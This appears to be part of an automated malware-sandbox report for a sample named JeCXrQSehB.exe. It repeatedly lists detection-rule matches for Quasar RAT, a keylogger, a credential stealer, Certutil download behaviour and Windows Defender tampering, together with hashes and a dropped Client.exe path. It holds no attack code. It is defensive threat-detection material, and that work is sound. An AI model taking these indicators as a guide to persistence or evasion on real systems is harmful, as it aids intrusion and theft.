      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
      Source: 00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
      Source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: QuasarRAT payload Author: ditekSHen
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
      Source: JeCXrQSehB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
      Source: 00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
      Source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
      Source: Process Memory Space: JeCXrQSehB.exe PID: 3480, type: MEMORYSTRMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
